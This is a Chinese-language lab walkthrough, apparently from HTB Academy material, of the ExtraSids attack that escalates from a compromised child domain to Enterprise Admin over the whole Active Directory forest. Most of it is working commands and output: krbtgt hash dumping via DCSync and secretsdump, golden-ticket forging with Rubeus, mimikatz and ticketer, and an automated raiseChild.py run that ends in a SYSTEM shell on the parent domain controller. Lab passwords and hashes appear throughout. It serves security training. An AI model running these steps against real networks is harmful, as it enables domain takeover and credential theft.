林内攻击-ExtraSids Attack
1. 实验环境
- DC02(子域控制器)- 10.129.229.207(DHCP)/ 172.16.210.3(双网卡)
dev.inlanefreight.ad - DC01(父域控制器)- 172.16.210.99
inlanefreight.ad - DC02 的账号密码:
Administrator和HTB_@cademy_adm!
2. 介绍
ExtraSids 攻击,也称为 SID history 滥用,是一种将 Active Directory 环境中子域的权限提升至父域的技术。
攻击者利用用户帐户的 SID history 属性来获取未经授权的访问权限并提权至 Active Directory 环境的父域。该技术涉及操纵子域中用户帐户的 SID 历史属性,使其继承父域中帐户或组的权限或组成员身份。
在同一个林中,由于缺乏 SID 过滤保护,sidHistory 属性仍然有效。SID 过滤是一种旨在过滤掉跨林信任关系中来自另一个林的域身份验证请求的保护机制。因此,如果子域中的某个用户将其 sidHistory 设置为企业管理员组(仅存在于父域中),该用户将被视为该组的成员,从而获得对整个林的管理访问权限。换句话说,可以利用已沦陷的子域创建一张黄金票据,以此来攻破父域。
在这种情况下,我们将利用 SID History ,通过修改此属性以包含企业管理员组的 SID,授予帐户(或不存在的帐户) Enterprise Admin 权限,这将使我们无需实际成为该组的成员即可完全访问父域。
2.1. 利用条件:
在拿下子域后执行此攻击,需要以下:
- 子域的 KRBTGT 哈希值
- 子域的 SID
- 子域的FQDN
- 根域的企业管理员组的 SID
然后可以使用mimikatz来进行攻击
2.2. SID History
sidHistory 属性用于迁移场景。如果一个域中的用户迁移到另一个域,则会在第二个域中创建一个 new account 。原始用户的 SID 将被添加到新用户的 SID history 属性中,以确保该用户仍然可以访问原始域中的资源。
SID history旨在跨域工作,但也可以在同一域内工作。攻击者可以使用 mimikatz 进行SID history注入,并将管理员帐户添加到其控制帐户的SID history属性中。当使用此帐户登录时,与该帐户关联的所有 SID 都会添加到用户的令牌中。
此令牌用于确定帐户可以访问哪些资源。如果将域管理员帐户的 SID 添加到此帐户的 SID 历史记录属性中,则此帐户就拥有了域管理员的账号权限
3. ExtraSids Attack
3.1. On Windows
假设我们现在已经攻破了子域,然后利用SIDHistory来迁移至父域
3.1.1. 获取子域KRBTGT 哈希值
PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:DEV\krbtgt" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:DEV\krbtgt
[DC] 'dev.INLANEFREIGHT.AD' will be the domain
[DC] 'DC02.dev.INLANEFREIGHT.AD' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 5/15/2023 5:39:11 AM
Object Security ID : S-1-5-21-2901893446-2198612369-2488268720-502
Object Relative ID : 502
Credentials:
Hash NTLM: 992093609707726257e0959ce3e24771
ntlm- 0: 992093609707726257e0959ce3e24771
lm - 0: 3491756dfc7414817b971dff2e4a7834
<SNIP>
也可以使用 powerview Get-DomainSID 函数来获取子域的 SID
3.1.2. 获取子域 SID
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2901893446-2198612369-2488268720
3.1.3. 获取企业管理员 SID
使用 powerview 中的 Get-DomainGroup 命令获取父域中 Enterprise Admins 组的 SID
PS C:\Tools> Get-ADGroup -Identity "Enterprise Admins" -Server "inlanefreight.ad"
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=AD
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : caa39c09-cb6e-4021-936f-afabfa6af908
SamAccountName : Enterprise Admins
SID : S-1-5-21-2879935145-656083549-3766571964-519
至此已完成全部条件的收集:
- 子域的 KRBTGT 哈希值:
992093609707726257e0959ce3e24771 - 子域的 SID:
S-1-5-21-2901893446-2198612369-2488268720 - 子域中目标用户的名称:
Administrator - 子域的FQDN:
DEV.INLANEFREIGHT.AD - 企业管理员组的 SID:
S-1-5-21-2879935145-656083549-3766571964-519
3.1.4. Rubeus伪造黄金票据
PS C:\Tools> .\Rubeus.exe golden /rc4:992093609707726257e0959ce3e24771 /domain:dev.inlanefreight.ad /sid:S-1-5-21-2901893446-2198612369-2488268720 /sids:S-1-5-21-2879935145-656083549-3766571964-519 /user:Administrator /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : DEV.INLANEFREIGHT.AD (DEV)
[*] SID : S-1-5-21-2901893446-2198612369-2488268720
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-2879935145-656083549-3766571964-519
[*] ServiceKey : 992093609707726257e0959ce3e24771
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 992093609707726257e0959ce3e24771
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : dev.inlanefreight.ad
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dev.inlanefreight.ad'
[*] AuthTime : 3/21/2024 4:54:06 AM
[*] StartTime : 3/21/2024 4:54:06 AM
[*] EndTime : 3/21/2024 2:54:06 PM
[*] RenewTill : 3/28/2024 4:54:06 AM
[*] base64(ticket.kirbi):
doIF0TCCBc2gAwIBBaEDAgEWooIEtjCCBLJhggSuMIIEqqADAgEFoRYbFERFVi5JTkxBTkVGUkVJR0hU
LkFEoikwJ6ADAgECoSAwHhsGa3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZKOCBF4wggRaoAMCAReh
AwIBA6KCBEwEggRIkMMhmLRh550nQxK7xcfcOYmGq42kxRqaQl1dXbPhNFiORjzYNq/ANWORzK/aVk7y
BnlJuRZNmWxSYLfIAc0L9FXg16byN9budsgda9OnunMhzCph8+yZO7PyZY87ZiwfCD2/+3HV2J4hlSqE
tUGupnqDoDCErp1fB8UE53Na9srZOs8S05Qg4T38Xj4mXymqu19VyJN2lYmszU/+li+WQoPjgi9DKwVT
umEQa36EKOlZ1weSSP7TwFvi46G+scSihtgO52iA+mP6KV6Qqcn4IaCfUzKc54dtzF8lyTKpLOBfSAyA
jtMLgxSmaJy76tHf9vJ6V5E1JMfXoJS3S3MOYDud/uk4sUzNTmmsiRCBdTs/B3VttTG6NLPwCgp8Lr3c
TJtqtx29mEqYNFbectK+BQYHhpYraBOKhHR2UrOt6d1R8cVv1x4s8iRB9PAZ5lHVJwKrljqGXB9Q3TMw
y3CFZ2kOo2TSBSUW31KFnPhX7fKStTonQyHM+rCFPuV68FUFPCarZZdhchEdd3Lz8anGFQFNvXt6qLva
oSOWY7UHWU482K2J9/LY4rRMJIAY8Wd9CmNNkOSLm/Z0bz3H1h57D7k+GWBSIvR0HDyZ4OcyYOMHZmSM
lsDH1Riw7/OwaiFAejXY+t8hTICTn5B/K6/xuYxgj7E7KhQgGpVWzEoaFTBD9fDP2RGSfbKpykj+iHU+
gYNI+PimQHQEbdqj5v8c+SBdC/1K6vCpTsJYHHOKZt+ZGcGyVfcn93FX1eI2wWmEMaO+9wauPtqd5VuK
<SNIP>
[+] Ticket successfully imported!
3.1.5. 利用 Mimikatz 伪造黄金票据
除了 Rubeus ,我们还可以使用 mimikatz 来生成黄金票据。Mimikatz 提供了另一种执行 ExtraSids attack 并生成用于权限提升的 golden tickets 途径。
C:\Tools> mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /user:Administrator /domain:dev.inlanefreight.ad /sid:S-1-5-21-2901893446-2198612369-2488268720 /krbtgt:992093609707726257e0959ce3e24771 /sids:S-1-5-21-2879935145-656083549-3766571964-519 /ptt
User : Administrator
Domain : dev.inlanefreight.ad (DEV)
SID : S-1-5-21-2901893446-2198612369-2488268720
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2879935145-656083549-3766571964-519 ;
ServiceKey: 992093609707726257e0959ce3e24771 - rc4_hmac_nt
Lifetime : 3/20/2024 5:41:55 AM ; 3/18/2034 5:41:55 AM ; 3/18/2034 5:41:55 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ dev.inlanefreight.ad' successfully submitted for current session
验证一下
PS C:\Tools> klist
Current LogonId is 0:0x7a8eb
Cached Tickets: (1)
#0> Client: Administrator @ dev.inlanefreight.adServer: krbtgt/dev.inlanefreight.ad @ dev.inlanefreight.adKerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/21/2024 5:29:21 (local)
End Time: 3/19/2034 5:29:21 (local)
Renew Time: 3/19/2034 5:29:21 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
3.2. On Linux
3.2.1. 获取子域krbtgt哈希
linux使用impacket-secretsdump来获取krbtgt的哈希
secretsdump.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@10.129.229.159 -just-dc-user DEV/krbtgt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:992093609707726257e0959ce3e24771:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:063d5b8a51a0b9843f12e93f28b7b055720d5a68e103c9243144ee6c703a43af
krbtgt:aes128-cts-hmac-sha1-96:fdc5f471923c5ec84322156e05e97eba
krbtgt:des-cbc-md5:fe31dfd5408c7073
[*] Cleaning up...
3.2.2. 获取子域的 SID
使用impacket-lookupsid获取SID
lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@10.129.229.159 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-2901893446-2198612369-2488268720
然后获取Enterprise Admins 组的 SID,通常都是域ID-519
lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@172.16.210.99 | grep -B12 "Enterprise Admins"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.210.99:445 ... OK
[*] Domain SID is: S-1-5-21-2879935145-656083549-3766571964
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\Administrator (SidTypeUser)
501: INLANEFREIGHT\Guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
3.2.3. ticketer.py伪造黄金票据
使用impacket-ticketer来伪造一个黄金票据
ticketer.py -nthash 992093609707726257e0959ce3e24771 -domain dev.inlanefreight.ad -domain-sid S-1-5-21-2901893446-2198612369-2488268720 -extra-sid S-1-5-21-2879935145-656083549-3766571964-519 htb-student
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dev.inlanefreight.ad/htb-student
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in htb-student.ccache
3.2.4. psexec
export KRB5CCNAME=htb-student.ccache
psexec.py dev.inlanefreight.ad/htb-student@DC01.inlanefreight.ad -k -no-pass -target-ip 172.16.210.99
3.3. raiseChild.py 自动化攻击
impacket-raiseChild可以自动从子域提权到父域,此脚本通过为林的企业管理员创建黄金票据来自动执行此过程。
运行此脚本只需要提供一个子域的管理员凭据即可
proxychains raiseChild.py -target-exe 172.16.210.99 dev.inlanefreight.ad/htb-student
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password: HTB_@cademy_stdnt!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.210.99:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... dev.inlanefreight.ad:445 ... OK
[*] Raising child domain dev.INLANEFREIGHT.AD
[*] Forest FQDN is: INLANEFREIGHT.AD
[*] Raising dev.INLANEFREIGHT.AD to INLANEFREIGHT.AD
[*] INLANEFREIGHT.AD Enterprise Admin SID is: S-1-5-21-2879935145-656083549-3766571964-519
[*] Getting credentials for dev.INLANEFREIGHT.AD
dev.INLANEFREIGHT.AD/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:992093609707726257e0959ce3e24771:::
dev.INLANEFREIGHT.AD/krbtgt:aes256-cts-hmac-sha1-96s:063d5b8a51a0b9843f12e93f28b7b055720d5a68e103c9243144ee6c703a43af
[*] Getting credentials for INLANEFREIGHT.AD
INLANEFREIGHT.AD/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f010dc02629137a52a934477510431dd:::
INLANEFREIGHT.AD/krbtgt:aes256-cts-hmac-sha1-96s:d4b96d6177a50bc2d283a46a9726da6d17724c5b6722cc4a5e3b32319499e0b9
[*] Target User account name is Administrator
INLANEFREIGHT.AD/Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a1b9ccba556848665ca315b3e096fdb:::
INLANEFREIGHT.AD/Administrator:aes256-cts-hmac-sha1-96s:9d76fc817ad130c2735cf8a68f4825947bd0fa52fecdd1506a785e9bcc24d19e
[*] Opening PSEXEC shell at DC01.INLANEFREIGHT.AD
[*] Requesting shares on DC01.INLANEFREIGHT.AD.....
[-] share 'ADCS_flag' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file TlktMwUI.exe
[*] Opening SVCManager on DC01.INLANEFREIGHT.AD.....
[*] Creating service qDDc on DC01.INLANEFREIGHT.AD.....
[*] Starting service qDDc.....
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
DC01